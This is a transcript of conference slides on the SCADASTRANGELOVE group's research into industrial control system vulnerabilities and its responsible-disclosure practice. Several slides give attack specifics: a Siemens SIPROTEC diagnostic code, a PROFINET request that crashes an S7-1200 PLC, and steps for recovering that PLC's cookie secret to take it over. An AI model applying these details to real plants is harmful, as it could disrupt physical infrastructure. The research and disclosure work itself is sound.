My Presentation "In Your Hands" by Halle Bailey
 
lONG QUESTION ANSWER PAKISTAN STUDIES10.
lONG QUESTION ANSWER PAKISTAN STUDIES10.lONG QUESTION ANSWER PAKISTAN STUDIES10.
lONG QUESTION ANSWER PAKISTAN STUDIES10.
 
Zone Chairperson Role and Responsibilities New updated.pptx
Zone Chairperson Role and Responsibilities New updated.pptxZone Chairperson Role and Responsibilities New updated.pptx
Zone Chairperson Role and Responsibilities New updated.pptx
 
ICT role in 21st century education and it's challenges.pdf
ICT role in 21st century education and it's challenges.pdfICT role in 21st century education and it's challenges.pdf
ICT role in 21st century education and it's challenges.pdf
 
Introduction to Artificial intelligence.
Introduction to Artificial intelligence.Introduction to Artificial intelligence.
Introduction to Artificial intelligence.
 
Proofreading- Basics to Artificial Intelligence Integration - Presentation:Sl...
Proofreading- Basics to Artificial Intelligence Integration - Presentation:Sl...Proofreading- Basics to Artificial Intelligence Integration - Presentation:Sl...
Proofreading- Basics to Artificial Intelligence Integration - Presentation:Sl...
 

Attacking SCADA systems: Story Of SCADASTRANGELOVE

  • 2. Aleksandr Timorin lifecycle:  Studied mathematics (OMG!)  Python developer  Penetration tester  ICS security researcher: • Industrial protocols fan and 0-day PLC hunter • SCADAStrangeLove team member atimorin atimorin@protonmail.ch
  • 3.  WWW: who are we, why are we and what are we for ?  Milestone  Projects: • Past • Present • Future  Results
  • 4.
  • 5.  Group of security researchers focused on ICS/SCADA to save Humanity from industrial disaster and to keep Purity Of Essence Alexander Timorin Alexander Tlyapov Alexander Zaitsev Alexey Osipov Andrey Medov Artem Chaykin Denis Baranov Dmitry Efanov Dmitry Nagibin Dmitry Serebryannikov Dmitry Sklyarov Evgeny Ermakov Gleb Gritsai Ilya Karpov Ivan Poliyanchuk Kirill Nesterov Roman Ilin Sergey Bobrov Sergey Drozdov Sergey Gordeychik Sergey Scherbel Timur Yunusov Valentin Shilnenkov Vladimir Kochetkov Vyacheslav Egoshin Yuri Goltsev Yuriy Dyachenko
  • 6.  We work for community and as community
  • 7. Since Stuxnet (2010) ICS industry especially security has been warned.
  • 8. • ICS is everywhere • Old technologies without classic and modern security principles • ICS networks “isolated”, but connected to other nets, other nets connected to Internet • Sometimes (shodan/censys/zmap/masscan proved) ICS devices connected to the Internet directly • Hacking ICS without money does not attract evil guy • Engineers tend to say “this works for a long period of time! Don’t touch it!”
  • 9. • But reality shows us that evil guys touch them and ICS so tender • We was worried about it. • We didn’t accept this approach. • We decided to change situation. • Then SCADASTRANGELOVE was born
  • 10. Peace is our profession!
  • 11.  As a group of researchers we work in different companies  Not only one company with private atmosphere  Everybody can be a member
  • 12. Members has their own projects but still contributing to long- term projects #SCADAPASS and #SCADASOS
  • 13.  We regularly give a talks worldwide in security conferences: CCC, Power of Community, CodeBlue, PacSec, PHDays, Zeronights, Confidence, Hack.lu …  We show and share our results with community  We share researches of our projects  We share toolkits, scripts, dorks, analytics and statistics
  • 14.  2012: only 4 members  From 2013 to 2016: over 30 members  Over 100 0-dayz  Tons of vulnerabilities: binary, web, default credentials and so on  Different industries: from transportation to renewable energy
  • 15. Vulnerabilities: • Memory errors • Cryptofails • Web • Special “features” (aka backdoors) • Default and hardcoded credentials • Industrial protocols • Fun but non-profit
  • 16. Vulnerabilities: • Siemens • General electric • Schneider electric • Yokogawa • Honeywell • Abb • Advantech • etc
  • 17. Vulnerabilities: • Server/client scada software • PLC, HMI, RTU • Protective relays, actuators, converters • Smart meters, data concentrators • Network switches, gateways • Gsm/gprs modems • etc
  • 18. • Honeywell EPKS, CVE-2014-9189
  • 19. • Honeywell EPKS, CVE-2014-9187
  • 20. • cb is a buffer size
  • 21. • SpiderControl SCADA Web Server, stack-based bof, CVE- 2015-1001
  • 22.
  • 23. to get firmware? to get debug symbols? to debug? ..PowerPC no “operation system”
  • 24.
  • 25.
  • 26.
  • 27. • Siemens SIPROTEC 7SJ64 (protective relay) XSS
  • 29.
  • 30.
  • 31. WinCCExplorer.exe/PdlRt.exe Create and use your own security features Instead of standard features – that’s A bad idea!
  • 32. • Hardcodes are for protocols with auth: SNMP, telnet, HTTP, etc. • You can hardcode keys, certificates, passwords • SMA Sunny WebBox
  • 33. • Siemens SIPROTEC 4 protective relay confirmation code “311299”: - System log - Device info - Stack and other parts of memory - More ?
  • 34. • Siemens SIPROTEC 4 protective relay confirmation code “311299”: “SIPROTEC 4 and SIPROTEC Compact devices allow the display of extended internal statistics and test information… To access this information, the confirmation code “311299” needs to be provided when prompted.” “...Siemens does not publish official documentation on these statistics. It is strongly recommended to work together with Siemens SIPROTEC customer care or commissioning experts to retrieve and interpret the statistics and test information...”
  • 35. • Siemens S7-1200 PLC, CVE-2014-2252 “An attacker could cause the device to go into defect mode if specially crafted PROFINET packets are sent to the device. A cold restart is required to recover the system. ” Just “set” PROFINET request: set network info (ip, netmask, gateway) with all zero values.
  • 36. KIOSK mode: Limit access to OS functions
  • 37. KIOSK mode: Limit access to OS functions
  • 38. • Wincc accounts: “secret” crypto key
  • 39. • WinCC accounts: “secret” crypto key fixed • It’s XOR, they should not bother hardcoding for XOR
  • 41. • TIA Portal PEData.plf passwords history
  • 42. • Winccwebbridge.dll: please hash your hardcoded account
  • 43. • Siemens S7-1200, S7-1500 PLC, CVE-2014-2250, CVE- 2014-2251
  • 44. • Siemens S7-1200, S7-1500 PLC, CVE-2014-2250, CVE- 2014-2251 • Seed = plc_start_time + const
  • 45. Target – Siemens S7-1200 PLC
  • 47. 3e6cd1f7bdf743cac6dcba708c21994f MD5 of ? (16bytes) d37fa1c3 CONST (4 bytes) 0001 user logout counter (2 bytes) 0001 counter of issued cookies for this user (2 bytes) 00028ad7 value that doesn’t matter (4 bytes) 0a00aac8 user IP address (10.0.170.200) (4 bytes) 00000000000000008ad72143 value that doesn’t matter (12 bytes) What about 3e6cd1f7bdf743cac6dcba708c21994f ?
  • 48. MD5( NEXT 26 BYTES OF COOKIE + 16BYTES OF SECRET + 2 NULL BYTES) What is SECRET ? SECRET generates after PLC start by ~PRNG. PRNG is a little bit harder than standard C PRNG. SEED in {0x0000 , 0xFFFF}
  • 49. SEED very often depends on time value SEED = PLC START TIME + 320 320 by practical way: secret generates after ~ 3-4 seconds of PLC start using current time PLC START TIME = CURRENT TIME – UPTIME Current time via web interface Uptime via SNMP with hardcoded read community string “public”
  • 50. Profinet “feature” and PRNG vulnerability - real attack vector. Result - PLC takeover.
  • 51.
  • 52. - Hash passwords - SHA is not good enough - Put length of plaintext nearby Redbox_value = len(pwd)*2+1
  • 53. “Secure” set up speed of energetic turbine More details at “SCADA deep inside: protocols and security mechanisms”
  • 54. Industrial protocols: S7-300 PLC password cracker. Included in the popular tool thc-hydra.
  • 55.
  • 56.
  • 57.
  • 60.  We work with responsible disclosure approach  Full disclosure = all vuln details immediately in the wild. Giving the vendors absolutely no opportunity to release a fix  Responsible disclosure = researcher contacts the vendor before the vulnerability is released. And all stakeholders agree to allow a period of time for the vulnerability to be patched before publishing the details.  Because vulnerability patching very important for ICS and can take months. Even years.
  • 61.  That’s why responsible disclosure in ICS highly important
  • 62. 1. Research 2. We send details directly to vendor and CERT 3. Vendor create CVE 4. Vulnerability patched 5. SCADASL public disclosure and exploit/toolkit publishing 6. Applause to SCADASL 7. Research 8. …
  • 63. Analytics every year:  ICSMAP  ICSDORKS
  • 64.  #SCADAPASS • Release 1.2 • 37 vendors • PLC, RTU, gateways, switches, servers …
  • 65.  #SCADASOS (un)Secure Open SmartGrids is open initiative to rise awareness on insecurities of SmartGrid, Photovoltaic Power Stations and Wind Farms
  • 66. Q: How to participate A: Find Internet-connected PV and Wind power stations and notify vendors/CERTs/community. Q: Wow! It simple! Can I hack it? A: No. It can be a hospital or your grandma’s cottage. Please use passive approach (firmware analysis, testbeds etc.) Q: I get an 0day! A: Please submit it to vendor and/or regional CERT Q: What will I get? A: Kudos at SCADA StrangeLove Talks/Knowledge/Safer World. Details You can make shodan saved search or drop google dorks to twitter Please use tags #solar #wind #scadasos
  • 67.  60 000+ SmartGrid devices disconnected from the Internet  Two Advisories • XZERES 442SR Wind Turbine CSRF • SMA Solar Technology AG Sunny WebBox Hard-Coded Account Vulnerability
  • 68. Current and future:  Smart energy generation  Rail road and signaling systems  Digital substations  GSM/GPRS modems
  • 69.  Well-known and habitual world of information security growing up, evolving, changing quickly  Because a lot of specialists involved in it  Unfortunately ICS security area not very mobile and changeable  Also our team members growing old, starting a families  We think that our mission done successfully
  • 70.  But not finished yet….
  • 71. Still trying to hack ICS, son? Have you ever heard about SCADASTRANGELOVE ?!
  • 72.  All materials at SCADA.SL  We hope that our work can help you create your own projects. But don’t forget about community and responsible disclosure principle
  • 73. *Allpicturesaretakenfrom googleandotherInternets Alexander Timorin Alexander Tlyapov Alexander Zaitsev Alexey Osipov Andrey Medov Artem Chaykin Denis Baranov Dmitry Efanov Dmitry Nagibin Dmitry Serebryannikov Dmitry Sklyarov Evgeny Ermakov Gleb Gritsai Ilya Karpov Ivan Poliyanchuk Kirill Nesterov Roman Ilin Sergey Bobrov Sergey Drozdov Sergey Gordeychik Sergey Scherbel Timur Yunusov Valentin Shilnenkov Vladimir Kochetkov Vyacheslav Egoshin Yuri Goltsev Yuriy Dyachenko

Notas do Editor

  1. For eample DS in your window – easy target for evil guy. Bud good news and only one – he is not economically motivated to do this. No profit! He prefer to hack banks and so on
  2. JUST A BSOD_JOKE!